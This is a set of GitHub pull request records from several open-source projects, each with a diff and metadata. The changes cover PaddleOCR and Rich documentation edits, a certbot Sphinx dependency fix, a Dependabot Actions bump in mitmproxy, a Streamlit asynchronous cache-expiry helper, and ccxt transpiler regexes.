diff --git a/deploy/cpp_infer/readme.md b/deploy/cpp_infer/readme.md index b563ecf48c..f81d9c75e9 100644 --- a/deploy/cpp_infer/readme.md +++ b/deploy/cpp_infer/readme.md @@ -1,6 +1,8 @@ # 服务器端C++预测 -本教程将介绍在服务器端部署PaddleOCR超轻量中文检测、识别模型的详细步骤。 +本章节介绍PaddleOCR 模型的的C++部署方法,与之对应的python预测部署方式参考[文档](../../doc/doc_ch/inference.md)。 +C++在性能计算上优于python,因此,在大多数CPU、GPU部署场景,多采用C++的部署方式,本节将介绍如何在Linux\Windows (CPU\GPU)环境下配置C++环境并完成 +PaddleOCR模型部署。 ## 1. 准备环境 diff --git a/deploy/cpp_infer/readme_en.md b/deploy/cpp_infer/readme_en.md index 41c764bc18..8a0bd62ecc 100644 --- a/deploy/cpp_infer/readme_en.md +++ b/deploy/cpp_infer/readme_en.md @@ -1,7 +1,9 @@ # Server-side C++ inference - -In this tutorial, we will introduce the detailed steps of deploying PaddleOCR ultra-lightweight Chinese detection and recognition models on the server side. +This chapter introduces the C++ deployment method of the PaddleOCR model, and the corresponding python predictive deployment method refers to [document](../../doc/doc_ch/inference.md). +C++ is better than python in terms of performance calculation. Therefore, in most CPU and GPU deployment scenarios, C++ deployment is mostly used. +This section will introduce how to configure the C++ environment and complete it in the Linux\Windows (CPU\GPU) environment +PaddleOCR model deployment. ## 1. Prepare the environment diff --git a/doc/doc_ch/inference.md b/doc/doc_ch/inference.md index f0a8983c4b..7968b355ea 100755 --- a/doc/doc_ch/inference.md +++ b/doc/doc_ch/inference.md @@ -2,10 +2,11 @@ # 基于Python预测引擎推理 inference 模型(`paddle.jit.save`保存的模型) -一般是模型训练完成后保存的固化模型,多用于预测部署。训练过程中保存的模型是checkpoints模型,保存的是模型的参数,多用于恢复训练等。 -与checkpoints模型相比,inference 模型会额外保存模型的结构信息,在预测部署、加速推理上性能优越,灵活方便,适合与实际系统集成。 +一般是模型训练,把模型结构和模型参数保存在文件中的固化模型,多用于预测部署场景。 +训练过程中保存的模型是checkpoints模型,保存的只有模型的参数,多用于恢复训练等。 +与checkpoints模型相比,inference 模型会额外保存模型的结构信息,在预测部署、加速推理上性能优越,灵活方便,适合于实际系统集成。 -接下来首先介绍如何将训练的模型转换成inference模型,然后将依次介绍文本检测、文本角度分类器、文本识别以及三者串联基于预测引擎推理。 +接下来首先介绍如何将训练的模型转换成inference模型,然后将依次介绍文本检测、文本角度分类器、文本识别以及三者串联在CPU、GPU上的预测方法。 - [一、训练模型转inference模型](#训练模型转inference模型) diff --git a/doc/doc_ch/installation.md b/doc/doc_ch/installation.md index fce151eb9f..7e7523b999 100644 --- a/doc/doc_ch/installation.md +++ b/doc/doc_ch/installation.md @@ -30,7 +30,7 @@ sudo nvidia-docker run --name ppocr -v $PWD:/paddle --shm-size=64G --network=hos sudo docker container exec -it ppocr /bin/bash ``` -**2. 安装PaddlePaddle Fluid v2.0** +**2. 安装PaddlePaddle 2.0** ``` pip3 install --upgrade pip diff --git a/doc/doc_en/inference_en.md b/doc/doc_en/inference_en.md index 6b745619c9..aa3e0536cb 100755 --- a/doc/doc_en/inference_en.md +++ b/doc/doc_en/inference_en.md @@ -5,7 +5,8 @@ The inference model (the model saved by `paddle.jit.save`) is generally a solidi The model saved during the training process is the checkpoints model, which saves the parameters of the model and is mostly used to resume training. -Compared with the checkpoints model, the inference model will additionally save the structural information of the model. It has superior performance in predicting in deployment and accelerating inferencing, is flexible and convenient, and is suitable for integration with actual systems. For more details, please refer to the document [Classification Framework](https://github.com/PaddlePaddle/PaddleClas/blob/master/docs/zh_CN/extension/paddle_inference.md). +Compared with the checkpoints model, the inference model will additionally save the structural information of the model. Therefore, it is easier to deploy because the model structure and model parameters are already solidified in the inference model file, and is suitable for integration with actual systems. +For more details, please refer to the document [Classification Framework](https://github.com/PaddlePaddle/PaddleClas/blob/release%2F2.0/docs/zh_CN/extension/paddle_mobile_inference.md). Next, we first introduce how to convert a trained model into an inference model, and then we will introduce text detection, text recognition, angle class, and the concatenation of them based on inference model. diff --git a/doc/doc_en/installation_en.md b/doc/doc_en/installation_en.md index 35c1881d12..dec384b2f2 100644 --- a/doc/doc_en/installation_en.md +++ b/doc/doc_en/installation_en.md @@ -33,7 +33,7 @@ You can also visit [DockerHub](https://hub.docker.com/r/paddlepaddle/paddle/tags sudo docker container exec -it ppocr /bin/bash ``` -**2. Install PaddlePaddle Fluid v2.0** +**2. Install PaddlePaddle 2.0** ``` pip3 install --upgrade pip diff --git a/tools/infer/utility.py b/tools/infer/utility.py index 4171a29bdd..a4a91efdd2 100755 --- a/tools/infer/utility.py +++ b/tools/infer/utility.py @@ -47,6 +47,7 @@ def str2bool(v): parser.add_argument("--det_db_box_thresh", type=float, default=0.5) parser.add_argument("--det_db_unclip_ratio", type=float, default=1.6) parser.add_argument("--max_batch_size", type=int, default=10) + parser.add_argument("--use_dilation", type=bool, default=False) # EAST parmas parser.add_argument("--det_east_score_thresh", type=float, default=0.8) parser.add_argument("--det_east_cover_thresh", type=float, default=0.1) @@ -123,6 +124,8 @@ def create_predictor(args, mode, logger): # cache 10 different shapes for mkldnn to avoid memory leak config.set_mkldnn_cache_capacity(10) config.enable_mkldnn() + # TODO LDOUBLEV: fix mkldnn bug when bach_size > 1 + #config.set_mkldnn_op({'conv2d', 'depthwise_conv2d', 'pool2d', 'batch_norm'}) args.rec_batch_num = 1 # config.enable_memory_optim() diff --git a/tools/program.py b/tools/program.py index 6277d74758..ae6491768c 100755 --- a/tools/program.py +++ b/tools/program.py @@ -394,6 +394,7 @@ def preprocess(is_train=False): logger = get_logger(name='root', log_file=log_file) if config['Global']['use_visualdl']: from visualdl import LogWriter + save_model_dir = config['Global']['save_model_dir'] vdl_writer_path = '{}/vdl/'.format(save_model_dir) os.makedirs(vdl_writer_path, exist_ok=True) vdl_writer = LogWriter(logdir=vdl_writer_path) diff --git a/train.sh b/train.sh index 8fe861a3d7..4225470cb9 100644 --- a/train.sh +++ b/train.sh @@ -1,2 +1,2 @@ # recommended paddle.__version__ == 2.0.0 -python3 -m paddle.distributed.launch --gpus '0,1,2,3,4,5,6,7' tools/train.py -c configs/rec/rec_mv3_none_bilstm_ctc.yml +python3 -m paddle.distributed.launch --log_dir=./debug/ --gpus '0,1,2,3,4,5,6,7' tools/train.py -c configs/rec/rec_mv3_none_bilstm_ctc.yml
优化部署、安装相关文档
https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/2024
2021-02-18T11:26:01Z
2021-02-18T11:26:39Z
2021-02-18T11:26:39Z
2021-02-18T11:26:39Z
2,127
PaddlePaddle/PaddleOCR
42,120
Update Armstrong_number.py
diff --git a/Armstrong_number.py b/Armstrong_number.py index 0c680c7def..be923c0bf3 100644 --- a/Armstrong_number.py +++ b/Armstrong_number.py @@ -1,18 +1,21 @@ def is_armstrong_number(number): - sum = 0 + total = 0 # find the sum of the cube of each digit temp = number while temp > 0: - digit = temp % 10 - sum += digit ** 3 - temp //= 10 + digit = temp % 10 + total += digit ** 3 + temp //= 10 - # display the result - if number == sum: - print(number,"is an Armstrong number") + # return the result + if number == total: + return True else: - print(number,"is not an Armstrong number") + return False -number = int(input("Enter the number : ")) -is_armstrong_number(number) +number = int(input("Enter the number: ")) +if is_armstrong_number(number): + print(number,"is an Armstrong number") +else: + print(number,"is not an Armstrong number")
The variable name sum is a built-in function name in Python. It is not a good practice to use built-in function names as variable names. It is recommended to use a different variable name, such as total or sum_of_cubes. The code is using the print function to display the result. It is generally better to return the result instead of printing it, so that the function can be used in other parts of the code.
https://api.github.com/repos/geekcomputers/Python/pulls/1862
2023-03-17T09:25:26Z
2023-03-18T09:57:27Z
2023-03-18T09:57:27Z
2023-03-18T09:57:27Z
283
geekcomputers/Python
31,135
Conditionally depend on imgconverter for newer versions of Sphinx
diff --git a/CHANGELOG.md b/CHANGELOG.md index 4b10a580512..1b8032fa1d2 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -19,6 +19,7 @@ Certbot adheres to [Semantic Versioning](http://semver.org/). ### Fixed * Update code and dependencies to clean up Resource and Deprecation Warnings. +* Only depend on imgconverter extension for Sphinx >= 1.6 Despite us having broken lockstep, we are continuing to release new versions of all Certbot components during releases for the time being, however, the only diff --git a/docs/conf.py b/docs/conf.py index 2e6c5a9b71d..c72d1c1cff1 100644 --- a/docs/conf.py +++ b/docs/conf.py @@ -17,6 +17,8 @@ import re import sys +import sphinx + here = os.path.abspath(os.path.dirname(__file__)) @@ -33,14 +35,13 @@ # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. -needs_sphinx = '1.0' +needs_sphinx = '1.2' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ 'sphinx.ext.autodoc', - 'sphinx.ext.imgconverter', 'sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.coverage', @@ -48,6 +49,9 @@ 'repoze.sphinx.autointerface', ] +if sphinx.version_info >= (1, 6): + extensions.append('sphinx.ext.imgconverter') + autodoc_member_order = 'bysource' autodoc_default_flags = ['show-inheritance', 'private-members'] diff --git a/setup.py b/setup.py index f8f5feadc40..90e68680dcb 100644 --- a/setup.py +++ b/setup.py @@ -68,9 +68,10 @@ def read_file(filename, encoding='utf8'): ] docs_extras = [ + # If you have Sphinx<1.5.1, you need docutils<0.13.1 + # https://github.com/sphinx-doc/sphinx/issues/3212 'repoze.sphinx.autointerface', - # sphinx.ext.imgconverter - 'Sphinx >=1.6', + 'Sphinx>=1.2', # Annotation support 'sphinx_rtd_theme', ] diff --git a/tools/dev_constraints.txt b/tools/dev_constraints.txt index 65182bcded5..778012d31d3 100644 --- a/tools/dev_constraints.txt +++ b/tools/dev_constraints.txt @@ -14,7 +14,7 @@ coverage==4.4.2 decorator==4.1.2 dns-lexicon==2.7.14 dnspython==1.15.0 -docutils==0.14 +docutils==0.12 execnet==1.5.0 future==0.16.0 futures==3.1.1
Fixes #6343. Be sure to edit the `master` section of `CHANGELOG.md` with a line describing this PR before it gets merged.
https://api.github.com/repos/certbot/certbot/pulls/6536
2018-11-28T18:06:32Z
2018-12-04T18:56:17Z
2018-12-04T18:56:16Z
2018-12-04T18:56:21Z
731
certbot/certbot
447
Revert "Bump the release version in pyproject.toml"
diff --git a/pyproject.toml b/pyproject.toml index 01f2984d7b..fbafd9bc9a 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -3,7 +3,7 @@ requires = ["setuptools", "wheel"] [project] name = "gpt-engineer" -version = "0.0.10" +version = "0.0.9" description = "Specify what you want it to build, the AI asks for clarification, and then builds it." readme = "README.md" requires-python = ">=3.8, <4.0"
Reverts AntonOsika/gpt-engineer#666
https://api.github.com/repos/gpt-engineer-org/gpt-engineer/pulls/672
2023-09-04T07:00:55Z
2023-09-04T07:01:09Z
2023-09-04T07:01:09Z
2023-12-04T12:53:56Z
141
gpt-engineer-org/gpt-engineer
33,163
Bump the github-actions group with 2 updates
diff --git a/.github/workflows/autofix.yml b/.github/workflows/autofix.yml index fe827c0947..e3767ed6f2 100644 --- a/.github/workflows/autofix.yml +++ b/.github/workflows/autofix.yml @@ -39,7 +39,7 @@ jobs: - uses: install-pinned/autoflake@46b4898323be58db319656fe2758f3fd5ddfee32 - run: autoflake --in-place --remove-all-unused-imports --exclude mitmproxy/contrib -r . - - uses: install-pinned/black@97252d99da3d792eedae55ff50e64df8bd162447 + - uses: install-pinned/black@ba55a508f931f1ee71ee049edba55c3382567656 - run: black . - name: Run prettier diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 7397cb20d7..e9b8dd2ec4 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -210,7 +210,7 @@ jobs: name: binaries.linux path: release/dist - uses: docker/setup-qemu-action@2b82ce82d56a2a04d2637cd93a637ae1b359c0a7 # v2.2.0 - - uses: docker/setup-buildx-action@4c0219f9ac95b02789c1075625400b2acbff50b1 # v1.6.0 + - uses: docker/setup-buildx-action@885d1462b80bc1c1c7f0b00334ad271f09369c55 # v1.6.0 - run: python release/build-and-deploy-docker.py deploy:
Bumps the github-actions group with 2 updates: [install-pinned/black](https://github.com/install-pinned/black) and [docker/setup-buildx-action](https://github.com/docker/setup-buildx-action). Updates `install-pinned/black` from 97252d99da3d792eedae55ff50e64df8bd162447 to ba55a508f931f1ee71ee049edba55c3382567656 <details> <summary>Commits</summary> <ul> <li><a href="https://github.com/install-pinned/black/commit/ba55a508f931f1ee71ee049edba55c3382567656"><code>ba55a50</code></a> update README.md (black 23.7.0)</li> <li><a href="https://github.com/install-pinned/black/commit/4a48eceba98e9cfbac87f256206539800464021f"><code>4a48ece</code></a> update pins (black 23.7.0)</li> <li>See full diff in <a href="https://github.com/install-pinned/black/compare/97252d99da3d792eedae55ff50e64df8bd162447...ba55a508f931f1ee71ee049edba55c3382567656">compare view</a></li> </ul> </details> <br /> Updates `docker/setup-buildx-action` from 2.9.1 to 2.10.0 <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/docker/setup-buildx-action/releases">docker/setup-buildx-action's releases</a>.</em></p> <blockquote> <h2>v2.10.0</h2> <h2>What's Changed</h2> <ul> <li>Bump <code>@​docker/actions-toolkit</code> from 0.7.1 to 0.10.0 by <a href="https://github.com/crazy-max"><code>@​crazy-max</code></a> in <a href="https://redirect.github.com/docker/setup-buildx-action/pull/258">docker/setup-buildx-action#258</a></li> <li>Bump word-wrap from 1.2.3 to 1.2.5 in <a href="https://redirect.github.com/docker/setup-buildx-action/pull/253">docker/setup-buildx-action#253</a></li> </ul> <p><strong>Full Changelog</strong>: <a href="https://github.com/docker/setup-buildx-action/compare/v2.9.1...v2.10.0">https://github.com/docker/setup-buildx-action/compare/v2.9.1...v2.10.0</a></p> </blockquote> </details> <details> <summary>Commits</summary> <ul> <li><a href="https://github.com/docker/setup-buildx-action/commit/885d1462b80bc1c1c7f0b00334ad271f09369c55"><code>885d146</code></a> Merge pull request <a href="https://redirect.github.com/docker/setup-buildx-action/issues/258">#258</a> from crazy-max/update-toolkit</li> <li><a href="https://github.com/docker/setup-buildx-action/commit/e5fad018d00dc71b199f641deb34adcd2dd1362e"><code>e5fad01</code></a> ci: check lab releases</li> <li><a href="https://github.com/docker/setup-buildx-action/commit/45161fd92a2d576283f9acd907a14d63ac064fb5"><code>45161fd</code></a> update generated content</li> <li><a href="https://github.com/docker/setup-buildx-action/commit/a4d51f53dd5c70934ae72739cde724f85358d34b"><code>a4d51f5</code></a> bump <code>@​docker/actions-toolkit</code> from 0.7.1 to 0.10.0</li> <li><a href="https://github.com/docker/setup-buildx-action/commit/93b8ecaa2c1900a3605b90629b56d2208bf1d41f"><code>93b8eca</code></a> ci: docker-ce packages are now installed on GitHub Runners</li> <li><a href="https://github.com/docker/setup-buildx-action/commit/7703e82fbced3d0c9eec08dff4429c023a5fd9a9"><code>7703e82</code></a> Merge pull request <a href="https://redirect.github.com/docker/setup-buildx-action/issues/253">#253</a> from docker/dependabot/npm_and_yarn/word-wrap-1.2.5</li> <li><a href="https://github.com/docker/setup-buildx-action/commit/0005881963856e76b0c8555665b82bf67160c9ef"><code>0005881</code></a> Merge pull request <a href="https://redirect.github.com/docker/setup-buildx-action/issues/254">#254</a> from crazy-max/rm-codeowners</li> <li><a href="https://github.com/docker/setup-buildx-action/commit/b699069f49d62b69f99848b5351b7cc2c94b85ba"><code>b699069</code></a> chore: remove CODEOWNERS</li> <li><a href="https://github.com/docker/setup-buildx-action/commit/9bfc5497b8a1d0ba2d3cedb28e3812a2956b5f42"><code>9bfc549</code></a> Bump word-wrap from 1.2.3 to 1.2.5</li> <li><a href="https://github.com/docker/setup-buildx-action/commit/b92d4d8769414806de390e017471f09793283cfc"><code>b92d4d8</code></a> Merge pull request <a href="https://redirect.github.com/docker/setup-buildx-action/issues/252">#252</a> from crazy-max/dependabot-update</li> <li>Additional commits viewable in <a href="https://github.com/docker/setup-buildx-action/compare/4c0219f9ac95b02789c1075625400b2acbff50b1...885d1462b80bc1c1c7f0b00334ad271f09369c55">compare view</a></li> </ul> </details> <br /> Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`. [//]: # (dependabot-automerge-start) [//]: # (dependabot-automerge-end) --- <details> <summary>Dependabot commands and options</summary> <br /> You can trigger Dependabot actions by commenting on this PR: - `@dependabot rebase` will rebase this PR - `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it - `@dependabot merge` will merge this PR after your CI passes on it - `@dependabot squash and merge` will squash and merge this PR after your CI passes on it - `@dependabot cancel merge` will cancel a previously requested merge and block automerging - `@dependabot reopen` will reopen this PR if it is closed - `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually - `@dependabot show <dependency name> ignore conditions` will show all of the ignore conditions of the specified dependency - `@dependabot ignore <dependency name> major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself) - `@dependabot ignore <dependency name> minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself) - `@dependabot ignore <dependency name>` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself) - `@dependabot unignore <dependency name>` will remove all of the ignore conditions of the specified dependency - `@dependabot unignore <dependency name> <ignore condition>` will remove the ignore condition of the specified dependency and ignore conditions </details>
https://api.github.com/repos/mitmproxy/mitmproxy/pulls/6349
2023-09-01T23:00:06Z
2023-09-05T13:32:54Z
2023-09-05T13:32:54Z
2023-09-05T13:33:04Z
443
mitmproxy/mitmproxy
28,167
Expire session storage cache on an async timer
diff --git a/lib/streamlit/runtime/caching/cache_resource_api.py b/lib/streamlit/runtime/caching/cache_resource_api.py index 6969a56b43ef..e6280ee5ae8f 100644 --- a/lib/streamlit/runtime/caching/cache_resource_api.py +++ b/lib/streamlit/runtime/caching/cache_resource_api.py @@ -22,7 +22,6 @@ from datetime import timedelta from typing import Any, Callable, TypeVar, cast, overload -from cachetools import TTLCache from typing_extensions import TypeAlias import streamlit as st @@ -48,6 +47,7 @@ from streamlit.runtime.metrics_util import gather_metrics from streamlit.runtime.scriptrunner.script_run_context import get_script_run_ctx from streamlit.runtime.stats import CacheStat, CacheStatsProvider, group_stats +from streamlit.util import TimedCleanupCache from streamlit.vendor.pympler.asizeof import asizeof _LOGGER = get_logger(__name__) @@ -473,7 +473,7 @@ def __init__( super().__init__() self.key = key self.display_name = display_name - self._mem_cache: TTLCache[str, MultiCacheResults] = TTLCache( + self._mem_cache: TimedCleanupCache[str, MultiCacheResults] = TimedCleanupCache( maxsize=max_entries, ttl=ttl_seconds, timer=cache_utils.TTLCACHE_TIMER ) self._mem_cache_lock = threading.Lock() diff --git a/lib/streamlit/runtime/caching/storage/in_memory_cache_storage_wrapper.py b/lib/streamlit/runtime/caching/storage/in_memory_cache_storage_wrapper.py index bb0d19e78294..dc750c394676 100644 --- a/lib/streamlit/runtime/caching/storage/in_memory_cache_storage_wrapper.py +++ b/lib/streamlit/runtime/caching/storage/in_memory_cache_storage_wrapper.py @@ -16,8 +16,6 @@ import math import threading -from cachetools import TTLCache - from streamlit.logger import get_logger from streamlit.runtime.caching import cache_utils from streamlit.runtime.caching.storage.cache_storage_protocol import ( @@ -26,6 +24,7 @@ CacheStorageKeyNotFoundError, ) from streamlit.runtime.stats import CacheStat +from streamlit.util import TimedCleanupCache _LOGGER = get_logger(__name__) @@ -62,7 +61,7 @@ def __init__(self, persist_storage: CacheStorage, context: CacheStorageContext): self.function_display_name = context.function_display_name self._ttl_seconds = context.ttl_seconds self._max_entries = context.max_entries - self._mem_cache: TTLCache[str, bytes] = TTLCache( + self._mem_cache: TimedCleanupCache[str, bytes] = TimedCleanupCache( maxsize=self.max_entries, ttl=self.ttl_seconds, timer=cache_utils.TTLCACHE_TIMER, diff --git a/lib/streamlit/runtime/memory_session_storage.py b/lib/streamlit/runtime/memory_session_storage.py index c9ee7511bf68..5e7088d6eeda 100644 --- a/lib/streamlit/runtime/memory_session_storage.py +++ b/lib/streamlit/runtime/memory_session_storage.py @@ -12,11 +12,11 @@ # See the License for the specific language governing permissions and # limitations under the License. -from typing import List, MutableMapping, Optional -from cachetools import TTLCache +from typing import List, MutableMapping, Optional from streamlit.runtime.session_manager import SessionInfo, SessionStorage +from streamlit.util import TimedCleanupCache class MemorySessionStorage(SessionStorage): @@ -55,7 +55,7 @@ def __init__( inaccessible and will be removed eventually. """ - self._cache: MutableMapping[str, SessionInfo] = TTLCache( + self._cache: MutableMapping[str, SessionInfo] = TimedCleanupCache( maxsize=maxsize, ttl=ttl_seconds ) diff --git a/lib/streamlit/util.py b/lib/streamlit/util.py index 4b4f3383309d..2f4bc126cdc4 100644 --- a/lib/streamlit/util.py +++ b/lib/streamlit/util.py @@ -16,14 +16,27 @@ from __future__ import annotations +import asyncio import dataclasses import functools import hashlib import os import subprocess import sys -from typing import Any, Dict, Iterable, List, Mapping, Set, TypeVar, Union +from typing import ( + Any, + Dict, + Generic, + Iterable, + List, + Mapping, + Optional, + Set, + TypeVar, + Union, +) +from cachetools import TTLCache from typing_extensions import Final from streamlit import env_util @@ -203,3 +216,37 @@ def extract_key_query_params( for item in sublist ] ) + + +K = TypeVar("K") +V = TypeVar("V") + + +class TimedCleanupCache(TTLCache, Generic[K, V]): + """A TTLCache that asynchronously expires its entries.""" + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self._task: Optional[asyncio.Task[Any]] = None + + def __setitem__(self, key: K, value: V) -> None: + # Set an expiration task to run periodically + # Can't be created in init because that only runs once and + # the event loop might not exist yet. + if self._task is None: + try: + self._task = asyncio.create_task(expire_cache(self)) + except RuntimeError: + # Just continue if the event loop isn't started yet. + pass + super().__setitem__(key, value) + + def __del__(self): + if self._task is not None: + self._task.cancel() + + +async def expire_cache(cache: TTLCache) -> None: + while True: + await asyncio.sleep(30) + cache.expire() diff --git a/lib/tests/streamlit/util_test.py b/lib/tests/streamlit/util_test.py index fd26c6fd0182..628ea3893149 100644 --- a/lib/tests/streamlit/util_test.py +++ b/lib/tests/streamlit/util_test.py @@ -12,6 +12,8 @@ # See the License for the specific language governing permissions and # limitations under the License. +import asyncio +import gc import random import unittest from typing import Dict, List, Set @@ -185,3 +187,26 @@ def test_calc_md5_can_handle_bytes_and_strings(self): util.calc_md5("eventually bytes"), util.calc_md5("eventually bytes".encode("utf-8")), ) + + def test_timed_cleanup_cache_gc(self): + """Test that the TimedCleanupCache does not leave behind tasks when + the cache is not externally reachable""" + loop = asyncio.new_event_loop() + asyncio.set_event_loop(loop) + + async def create_cache(): + cache = util.TimedCleanupCache(maxsize=2, ttl=10) + cache["foo"] = "bar" + + # expire_cache and create_cache + assert len(asyncio.all_tasks()) > 1 + + asyncio.run(create_cache()) + + gc.collect() + + async def check(): + # Only has this function running + assert len(asyncio.all_tasks()) == 1 + + asyncio.run(check())
## Describe your changes To reduce the tendency of expired sessions to stick around for a long time for lower traffic apps, and potentially consume lots of memory, add an async task to periodically expire the TTLCache used in the default session storage implementation. ## GitHub Issue Link (if applicable) ## Testing Plan Was manually tested, and a unit test for tasks not sticking around was included. --- **Contribution License Agreement** By submitting this pull request you agree that all contributions to this project are made under the Apache 2.0 license.
https://api.github.com/repos/streamlit/streamlit/pulls/8083
2024-02-05T21:16:48Z
2024-02-07T23:42:07Z
2024-02-07T23:42:07Z
2024-02-07T23:42:11Z
1,661
streamlit/streamlit
21,993
[docs] Fix typos and other small stuff
diff --git a/docs/source/progress.rst b/docs/source/progress.rst index 23693843b..272687d93 100644 --- a/docs/source/progress.rst +++ b/docs/source/progress.rst @@ -58,7 +58,7 @@ The ``total`` value associated with a task is the number of steps that must be c Updating tasks ~~~~~~~~~~~~~~ -When you call :meth:`~rich.progress.Progress.add_task` you get back a `Task ID`. Use this ID to call :meth:`~rich.progress.Progress.update` whenever you have completed some work, or any information has changed. Typically you will need to update ``completed`` every time you have completed a step. You can do this by updated ``completed`` directly or by setting ``advance`` which will add to the current ``completed`` value. +When you call :meth:`~rich.progress.Progress.add_task` you get back a `Task ID`. Use this ID to call :meth:`~rich.progress.Progress.update` whenever you have completed some work, or any information has changed. Typically you will need to update ``completed`` every time you have completed a step. You can do this by setting ``completed`` directly or by setting ``advance`` which will add to the current ``completed`` value. The :meth:`~rich.progress.Progress.update` method collects keyword arguments which are also associated with the task. Use this to supply any additional information you would like to render in the progress display. The additional arguments are stored in ``task.fields`` and may be referenced in :ref:`Column classes<Columns>`. @@ -234,7 +234,7 @@ Here's an example that reads a url from the internet:: If you expect to be reading from multiple files, you can use :meth:`~rich.progress.Progress.open` or :meth:`~rich.progress.Progress.wrap_file` to add a file progress to an existing Progress instance. -See `cp_progress.py <https://github.com/willmcgugan/rich/blob/master/examples/cp_progress.py>` for a minimal clone of the ``cp`` command which shows a progress bar as the file is copied. +See `cp_progress.py <https://github.com/willmcgugan/rich/blob/master/examples/cp_progress.py>`_ for a minimal clone of the ``cp`` command which shows a progress bar as the file is copied. Multiple Progress diff --git a/docs/source/tables.rst b/docs/source/tables.rst index fdc6ec043..f573dbc62 100644 --- a/docs/source/tables.rst +++ b/docs/source/tables.rst @@ -50,13 +50,13 @@ Table Options There are a number of keyword arguments on the Table constructor you can use to define how a table should look. -- ``title`` Sets the title of the table (text show above the table). -- ``caption`` Sets the table caption (text show below the table). +- ``title`` Sets the title of the table (text shown above the table). +- ``caption`` Sets the table caption (text shown below the table). - ``width`` Sets the desired width of the table (disables automatic width calculation). - ``min_width`` Sets a minimum width for the table. - ``box`` Sets one of the :ref:`appendix_box` styles for the table grid, or ``None`` for no grid. - ``safe_box`` Set to ``True`` to force the table to generate ASCII characters rather than unicode. -- ``padding`` An integer, or tuple of 1, 2, or 4 values to set the padding on cells. +- ``padding`` An integer, or tuple of 1, 2, or 4 values to set the padding on cells (see :ref:`Padding`). - ``collapse_padding`` If True the padding of neighboring cells will be merged. - ``pad_edge`` Set to False to remove padding around the edge of the table. - ``expand`` Set to True to expand the table to the full available size. diff --git a/docs/source/text.rst b/docs/source/text.rst index fd6851fb4..c5a1add82 100644 --- a/docs/source/text.rst +++ b/docs/source/text.rst @@ -28,12 +28,12 @@ Alternatively, you can construct styled text by calling :meth:`~rich.text.Text.a If you would like to use text that is already formatted with ANSI codes, call :meth:`~rich.text.Text.from_ansi` to convert it to a ``Text`` object:: - text = Text.from_ansi("\033[1mHello, World!\033[0m") + text = Text.from_ansi("\033[1;35mHello\033[0m, World!") console.print(text.spans) -Since building Text instances from parts is a common requirement, Rich offers :meth:`~rich.text.Text.assemble` which will combine strings or pairs of string and Style, and return a Text instance. The follow example is equivalent to the code above:: +Since building Text instances from parts is a common requirement, Rich offers :meth:`~rich.text.Text.assemble` which will combine strings or pairs of string and Style, and return a Text instance. The following example is equivalent to the ANSI example above:: - text = Text.assemble(("Hello", "bold magenta"), " World!") + text = Text.assemble(("Hello", "bold magenta"), ", World!") console.print(text) You can apply a style to given words in the text with :meth:`~rich.text.Text.highlight_words` or for ultimate control call :meth:`~rich.text.Text.highlight_regex` to highlight text matching a *regular expression*. diff --git a/rich/pretty.py b/rich/pretty.py index 498907f4c..5c48cfd9f 100644 --- a/rich/pretty.py +++ b/rich/pretty.py @@ -986,7 +986,7 @@ class StockKeepingUnit(NamedTuple): from rich import print - # print(Pretty(data, indent_guides=True, max_string=20)) + print(Pretty(data, indent_guides=True, max_string=20)) class Thing: def __repr__(self) -> str:
## Type of changes - [ ] Bug fix - [ ] New feature - [x] Documentation / docstrings - [ ] Tests - [ ] Other ## Checklist - [ ] I've run the latest [black](https://github.com/psf/black) with default args on new code. - [ ] I've updated CHANGELOG.md and CONTRIBUTORS.md where appropriate. - [ ] I've added tests for new code. - [x] I accept that @willmcgugan may be pedantic in the code review. ## Description Just some minor mistakes I found while reading the (otherwise excellent!) docs.
https://api.github.com/repos/Textualize/rich/pulls/3094
2023-08-19T18:03:08Z
2023-11-07T17:37:25Z
2023-11-07T17:37:25Z
2024-01-24T13:45:32Z
1,329
Textualize/rich
48,631
Add more transpile funcs
diff --git a/build/transpile.js b/build/transpile.js index ca21d24bfd75..f34011c62a11 100644 --- a/build/transpile.js +++ b/build/transpile.js @@ -68,6 +68,8 @@ const commonRegexes = [ [ /\.parseTrades\s/g, '.parse_trades'], [ /\.parseTrade\s/g, '.parse_trade'], [ /\.parseTradingViewOHLCV\s/g, '.parse_trading_view_ohlcv'], + [ /\.parseTransaction\s/g, '.parse_transaction'], + [ /\.parseTransactions\s/g, '.parse_transactions'], [ /\.parseOrderBook\s/g, '.parse_order_book'], [ /\.parseBidsAsks\s/g, '.parse_bids_asks'], [ /\.parseBidAsk\s/g, '.parse_bid_ask'], @@ -114,6 +116,7 @@ const commonRegexes = [ [ /\.currencyToPrecision\s/g, '.currency_to_precision'], [ /\.costToPrecision\s/g, '.cost_to_precision'], [ /\.commonCurrencyCode\s/g, '.common_currency_code'], + [ /\.loadAccounts\s/g, '.load_accounts'], [ /\.loadFees\s/g, '.load_fees'], [ /\.loadMarkets\s/g, '.load_markets'], [ /\.fetchMarkets\s/g, '.fetch_markets'],
While looking at the Python implementations for these, I got confused because these functions aren't transpiled. Feel free to disregard it, but it can make things clearer.
https://api.github.com/repos/ccxt/ccxt/pulls/5920
2019-10-04T16:20:06Z
2019-10-04T20:25:32Z
2019-10-04T20:25:32Z
2019-11-13T12:44:14Z
296
ccxt/ccxt
12,996
Should subsample Convolution1D on correct axis
